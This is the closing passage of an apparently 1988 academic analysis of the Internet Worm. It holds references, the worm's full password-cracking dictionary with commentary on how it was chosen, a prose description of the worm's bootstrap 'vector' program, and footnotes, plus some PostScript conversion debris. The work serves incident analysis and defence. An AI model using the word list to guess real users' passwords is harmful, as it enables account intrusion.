- Corporation, Keith Bostic of Berkeley, Donn Seeley of the
- University of Utah, Chris Torek of the University of Maryland,
- Dave Pare of FX Development, and the team at MIT: Mark W. Eichin,
- Stanley R. Zanarotti, Bill Sommerfeld, Ted Y. Ts'o, Jon Rochlis,
- Ken Raeburn, Hal Birkeland and John T. Kohl. A disassembled
- version of the worm code was provided at Purdue by staff of the
- Purdue University Computing Center, Rich Kulawiec in particular.
- Thanks to the individuals who reviewed early drafts of this paper
- and contributed their advice and expertise: Don Becker, Kathy
- Heaphy, Brian Kantor, R. J. Martin, Richard DeMillo, and
- especially Keith Bostic and Steve Bellovin. My thanks to all
- these individuals. My thanks and apologies to anyone who should
- have been credited and was not.
-
- References
-
- Allm83. Allman, Eric,
- Sendmail\320An Internetwork Mail Router,
- University of California, Berkeley, 1983. Issued with the BSD
- UNIX documentation set.
- Brun75. Brunner, John, The Shockwave Rider, Harper & Row, 1975.
- Cohe84. Cohen, Fred, ``Computer Viruses: Theory and
- Experiments,'' PROCEEDINGS OF THE 7TH NATIONAL COMPUTER SECURITY
- CONFERENCE, pp. 240-263, 1984.
- Denn88. Denning, Peter J., ``Computer Viruses,'' AMERICAN
- SCIENTIST, vol. 76, pp. 236-238, May-June 1988.
- Dewd85. Dewdney, A. K., ``A Core War Bestiary of viruses, worms,
- and other threats to computer memories,'' SCIENTIFIC AMERICAN,
- vol. 252, no. 3, pp. 14-23, May 1985.
- Gerr72. Gerrold, David, When Harlie Was One, Ballentine Books,
- 1972. The first edition.
- Gram84. Grampp, Fred. T. and Robert H. Morris, ``UNIX Operating
- System Security,''
- AT&T BELL LABORATORIES TECHNICAL JOURNAL, vol. 63, no. 8, part 2,
- pp. 1649-1672, Oct. 1984.
- Harr77. Harrenstien, K., ``Name/Finger,'' RFC 742, SRI Network
- Information Center, December 1977.
- Morr79. Morris, Robert and Ken Thompson, ``UNIX Password
- Security,'' COMMUNICATIONS OF THE ACM, vol. 22, no. 11, pp. 594-
- 597, ACM, November 1979.
- Post82. Postel, Jonathan B., ``Simple Mail Transfer Protocol,''
- RFC 821, SRI Network Information Center, August 1982.
- Reid87. Reid, Brian, ``Reflections on Some Recent Widespread
- Computer Breakins,'' COMMUNICATIONS OF THE ACM, vol. 30, no. 2,
- pp. 103-105, ACM, February 1987.
- Ritc79.Ritchie, Dennis M., ``On the Security of UNIX, '' in U nt
- 2 def IX nt 0 def
-
- SUPPLEMENTARY DOCUMENTS, AT & T, 1979. Seel88. Seeley, Donn, ``A
- Tour of the Worm,'' TECHNICAL REPORT, Computer Science Dept.,
- University of Utah, November 1988. Unpublished report.
- Shoc82. Shoch, John F. and Jon A. Hupp, ``The Worm Programs \320
- Early Experience with a Distributed Computation,'' COMMUNICATIONS
- OF THE ACM, vol. 25, no. 3, pp. 172-180, ACM, March 1982.
-
- Appendix A The Dictionary
-
- What follows is the mini-dictionary of words contained in the
- worm. These were tried when attempting to break user passwords.
- Looking through this list is, in some sense revealing, but
- actually raises a significant question: how was this list chosen?
- The assumption has been expressed by many people that this list
- represents words commonly used as passwords; this seems unlikely.
- Common choices for passwords usually include fantasy characters,
- but this list contains none of the likely choices \(e.g.,
- ``hobbit,'' ``dwarf,'' ``gandalf,'' ``skywalker,'' ``conan''\).
- Names of relatives and friends are often used, and we see women's
- names like ``jessica,'' ``caroline,'' and ``edwina,'' but no
- instance of the common names ``jennifer'' or ``kathy.'' Further,
- there are almost no men's names such as ``thomas'' or either of
- ``stephen'' or ``steven'' \(or ``eugene''!\). Additionally, none
- of these have the initial letters capitalized, although that is
- often how they are used in passwords. Also of interest, there are
- no obscene words in this dictionary, yet many reports of
- concerted password cracking experiments have revealed that there
- are a significant number of users who use such words \(or
- phrases\) as passwords. The list contains at least one incorrect
- spelling: ``commrades'' instead of ``comrades''; I also believe
- that ``markus'' is a misspelling of ``marcus.'' Some of the words
- do not appear in standard dictionaries and are non-English names:
- ``jixian,'' ``vasant,'' ``puneet,'' etc. There are also some
- unusual words in this list that I would not expect to be
- considered common: ``anthropogenic,'' ``imbroglio,'' ``umesh,''
- ``rochester,'' ``fungible,'' ``cerulean,'' etc. I imagine that
- this list was derived from some data gathering with a limited set
- of passwords, probably in some known \(to the author\) computing
- environment. That is, some dictionary-based or brute-force attack
- was used to crack a selection of a few hundred passwords taken
- >From a small set of machines. Other approaches to gathering
- passwords could also have been used\320Ethernet monitors, Trojan
- Horse login programs, etc. However they may have been cracked,
- the ones that were broken would then have been added to this
- dictionary. Interestingly enough, many of these words are not in
- the standard on-line dictionary \(in /usr/dict/words\). As such,
- these words are useful as a supplement to the main dictionary-
- based attack the worm used as strategy #4, but I would suspect
- them to be of limited use before that time. This unusual
- composition might be useful in the determination of the
- author\(s\) of this code. One approach would be to find a system
- with a user or local dictionary containing these words. Another
- would be to find some system\(s\) where a significant quantity of
- passwords could be broken with this list. aaa academia aerobics
- airplane albany albatross albert alex alexander algebra aliases
- alphabet ama amorphous analog anchor andromache animals answer
- anthropogenic anvils anything aria ariadne arrow arthur athena
- atmosphere aztecs azure bacchus bailey banana bananas bandit
- banks barber baritone bass bassoon batman beater beauty beethoven
- beloved benz beowulf berkeley berliner beryl beverly bicameral
- bob brenda brian bridget broadway bumbling burgess campanile
- cantor cardinal carmen carolina caroline cascades castle cat
- cayuga celtics cerulean change charles charming charon chester
- cigar classic clusters coffee coke collins commrades computer
- condo cookie cooper cornelius couscous creation creosote cretin
- daemon dancer daniel danny dave december defoe deluge desperate
- develop dieter digital discovery disney dog drought duncan eager
- easier edges edinburgh edwin edwina egghead eiderdown eileen
- einstein elephant elizabeth ellenemeraldengine engineer
- enterprise enzyme ersatz establish estate euclid evelyn extension
- fairway felicia fender fermat fidelity finite fishers flakes
- float flower flowers foolproof football foresight format forsythe
- fourier fred friend frighten fun fungible gabriel gardner
- garfield gauss george gertrude ginger glacier gnu golfer gorgeous
- gorges gosling gouge graham gryphon guestguitargumption guntis
- hacker hamlet handily happening harmony harold harvey hebrides
- heinlein hello help herbert hiawatha hibernia honey horse horus
- hutchins imbroglio imperial include ingres inna innocuous
- irishman isis japan jessica jester jixian johnny joseph joshua
- judith juggle julia kathleen kermit kernel kirkland knight ladle
- lambda lamination larkin larry lazaruslebesguelee leland leroy
- lewis light lisa louis lynne macintosh mack maggot magic malcolm
- mark markus marty marvin master maurice mellon merlin mets
- michael michelle mike minimum minsky moguls moose morley mozart
- nancy napoleon nepenthe ness network newton next noxious
- nutrition nyquist oceanography ocelot olivetti olivia oracle orca
- orwell osirisoutlawoxford pacific painless pakistan pam papers
- password patricia penguin peoria percolate persimmon persona pete
- peter philip phoenix pierre pizza plover plymouth polynomial
- pondering pork poster praise precious prelude prince princeton
- protect protozoa pumpkin puneet puppet rabbit rachmaninoff
- rainbow raindrop raleigh random rascal really rebecca remote rick
- ripple robotics rochesterrolexromano ronald rosebud rosemary
- roses ruben rules ruth sal saxon scamper scheme scott scotty
- secret sensor serenity sharks sharon sheffield sheldon shiva
- shivers shuttle signature simon simple singer single smile smiles
- smooch smother snatch snoopy soap socrates sossina sparrows spit
- spring springer squires strangle stratford stuttgart subway
- success summer supersuperstage support supported surfer suzanne
- swearer symmetry tangerine tape target tarragon taylor telephone
- temptation thailand tiger toggle tomato topography tortoise
- toyota trails trivial trombone tubas tuttle umesh unhappy unicorn
- unknown urchin utility vasant vertigo vicky village virginia
- warren water weenie whatnot whiting whitney will william
- williamsburg willie winston wisconsinwizardwombat woodwind
- wormwood yacov yang yellowstone yosemite zap zimmerman
-
- Appendix B The Vector Program
-
- The worm was brought over to each machine it infected via the
- actions of a small program I call the vector program. Other
- individuals have been referring to this as the grappling hook
- program. Some people have referred to it as the program, since
- that is the suffix used on each copy. The source for this program
- would be transferred to the victim machine using one of the
- methods discussed in the paper. It would then be compiled and
- invoked on the victim machine with three command line arguments:
- the canonical IP address of the infecting machine, the number of
- the TCP port to connect to on that machine to get copies of the
- main worm files, and a magic number that effectively acted as a
- one-time-challenge password. If the ``server'' worm on the remote
- host and port did not receive the same magic number back before
- starting the transfer, it would immedi- ately disconnect from the
- vector program. This can only have been to prevent some- one from
- attempting to ``capture'' the binary files by spoofing a worm
- ``server.'' This code also goes to some effort to hide itself,
- both by zeroing out the argu- ment vector, and by immediately
- forking a copy of itself. If a failure occurred in transferring a
- file, the code deleted all files it had already transferred, then
- it exited. One other key item to note in this code is that the
- vector was designed to be able to transfer up to 20 files; it was
- used with only three. This can only make one wonder if a more
- extensive version of the worm was planned for a later date, and
- if that version might have carried with it other command files,
- password data, or possibly local virus or trojan horse programs.
-
- <<what follows is a pair of programs that I was unable to decode
- with any dependability>>
-
- References:
-
- BSD is an acronym for Berkeley Software Distribution.
- UNIX is a registered trademark of AT&T Laboratories.
- VAX is a trademark of Digital Equipment Corporation.
-
- The second edition of the book, just published, has been
- ``updated'' to omit this subplot about VIRUS.
- %%Page: 4 5
-
- 5
- It is probably a coincidence that the Internet Worm was loosed on
- November 2, the eve of this ``birthday.''
- 6
- Note that a widely used alternative to sendmail, MMDF, is also
- viewed as too complex and large by many users. Further, it is
- not perceived to be as flexible as sendmail if it is necessary
- to establish special addressing and handling rules when bridging
- heterogeneous networks.
- 7
- Strictly speaking, the password is not encrypted. A block of zero
- bits is repeatedly encrypted using the user password, and the
- results of this encryption is what is saved. See [Morr79] for
- more details.
- 8
- Such a list would likely include all words in the dictionary, the
- reverse of all such words, and a large collection of proper
- names.
- 8
- rexec is a remote command execution service. It requires that a
- username/password combination be supplied as part of the
- request.
- 9
- This was compiled in as port number 23357, on host 127.0.0.1 \(loopback\).
- 10
- Using TCP port 11357 on host 128.32.137.13.
- 11
- Interestingly, although the program was coded to get the address
- of the host on the remote end of point-to-point links, no use
- seems to have been made of that information.
- 12
- As if some of them aren't suspicious enough!
- 13
- This appears to be a bug. The probable assumption was that the
- routine hl would handle infection of local hosts, but hl calls
- this routine! Thus, local hosts were never infected via this
- route.
- 14
- This is puzzling. The appropriate file to scan for equivalent
- hosts would have been the .rhosts file, not the .forward file.
- 15
- Private communication from someone present at the meeting.
- 16
- The thought of a Sequent Symmetry or Gould NP1 infected with
- multiple copies of the worm presents an awesome \(and awful\)
- thought. The effects noticed locally when the worm broke into a
- mostly unloaded VAX 8800 were spectacular. The effects on a
- machine with one or two orders of magnitude more capacity is a
- frightening thought.
- 17
- Developed by Kevin Braunsdorf and Rich Kulawiec at Purdue PUCC.
- 18
- Rick Adams, of the Center for Seismic Studies, has commented that
- we may someday hear that the worm was loosed to impress Jodie
- Foster. Without further information, this is as valid a
- speculation as any other, and should raise further disturbing
- questions; not everyone with access to computers is rational and
- sane, and future attacks may reflect this.
- 19
- Throughout this paper I have been writing author\(s\) instead of
- author. It occurs to me that most of the mail, Usenet postings,
- and media coverage of this incident have assumed that it was
- author \(singular\). Are we so unaccustomed to working together
- on programs that this is our natural inclination? Or is it that
- we find it hard to believe that more than one individual could
- have such poor judgement? I also noted that most of people I
- spoke with seemed to assume that the worm author was male. I
- leave it to others to speculate on the value, if any, of these
- observations.
-
-